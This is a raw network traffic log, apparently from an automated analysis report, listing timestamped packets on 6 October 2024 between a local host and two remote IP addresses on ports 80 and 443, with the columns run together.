                                                                                                                                                Oct 6, 2024 22:18:49.858997107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.859006882 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.859015942 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.859033108 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.859060049 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.860670090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.860687971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.860698938 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.860709906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.860733032 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.860737085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.860749006 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.860771894 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.860784054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.860805035 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.860822916 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.860826969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.860846043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.860862970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.860881090 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.860956907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.860959053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.860984087 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.860997915 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861033916 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861035109 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861072063 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861098051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861134052 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861160994 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861171007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861197948 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861257076 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861263037 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861274004 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861336946 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861368895 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861394882 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861426115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861433029 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861464024 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861464024 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861500025 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861501932 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861536980 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861561060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861598015 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861628056 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861638069 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861669064 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861705065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861743927 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861758947 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861769915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861798048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861824989 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861865997 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861866951 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861907959 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.861943007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861953020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.861985922 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862010956 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862030029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862040043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862049103 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862076044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862143993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862183094 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862196922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862206936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862234116 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862262964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862272978 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862296104 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862302065 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862332106 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862385035 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862420082 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862430096 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862436056 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862454891 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862471104 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862476110 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862512112 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862519026 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862529993 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862580061 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862580061 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862606049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862641096 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862668037 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862678051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862715960 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862744093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862755060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862763882 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862781048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862799883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862809896 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862811089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862834930 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862863064 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862884045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862921000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.862924099 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862972021 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.862987995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863009930 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863023043 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.863045931 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.863054991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863090038 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.863168955 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863181114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863189936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863208055 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.863231897 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.863282919 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863320112 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.863327026 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863338947 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863369942 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.863497972 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863508940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863518953 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863554001 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.863581896 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.863648891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863687038 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.863703966 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863713980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863740921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863750935 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.863754034 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.863782883 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:50.348567009 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:50.348618031 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:50.562979937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:50.563016891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:50.751319885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:50.751462936 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:50.829925060 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:50.834870100 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.020071030 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.020136118 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.020152092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.020234108 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.022979021 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.022979021 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.027789116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.203135967 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.203267097 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.296936989 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.297012091 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.301850080 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.301986933 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302000999 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302026033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302042007 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.302072048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.302102089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302119970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302156925 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.302164078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302186966 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.302207947 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.302217007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302267075 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.302367926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302381992 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302395105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302411079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302419901 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.302443027 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.302464008 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.302469969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302484989 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302500963 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302521944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.302551985 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.302566051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302578926 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302592039 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.302613020 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.302654028 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.307049990 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307111979 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.307130098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307189941 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.307213068 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307249069 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307264090 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.307301044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.307332039 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307394028 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.307420015 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307465076 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307478905 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307478905 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.307495117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307519913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.307533979 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.307554960 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307569027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307583094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307595968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307605982 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.307607889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307686090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307698965 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307710886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307723999 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307744980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307758093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307773113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307822943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307836056 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307848930 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307954073 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.307991982 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.308003902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.308026075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.308108091 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.311949015 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312016010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312028885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312052011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312066078 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312103033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312114954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312134027 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312149048 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312161922 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312200069 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312253952 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312280893 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312304020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312316895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312383890 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312396049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312410116 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312433004 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312446117 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312462091 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312475920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312498093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312510967 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312522888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312546968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312558889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312571049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312585115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312597036 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312741041 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.312752962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.707437038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.707660913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.750972033 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:51.756169081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.930809975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:51.930902958 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:52.563889027 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:52.563942909 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:52.564053059 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:52.580383062 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:52.580399036 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:53.505763054 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:53.505906105 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:53.555651903 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:53.555675983 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:53.555982113 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:53.556030989 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:53.558846951 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:53.599394083 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.054909945 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.054935932 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.055016041 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.055052042 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.055063009 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.055099964 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.286011934 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.286025047 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.286132097 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.286545992 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.286676884 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.287416935 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.287477016 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.335144997 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.335227966 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.517780066 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.517924070 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.517954111 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.518023014 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.518791914 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.518862963 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.519371986 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.519429922 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.520173073 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.520236969 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.520967960 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.521032095 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.566684961 CEST44363886103.6.198.219192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:54.566850901 CEST63886443192.168.2.6103.6.198.219
                                                                                                                                                Oct 6, 2024 22:18:54.567075014 CEST44363886103.6.198.219192.168.2.6
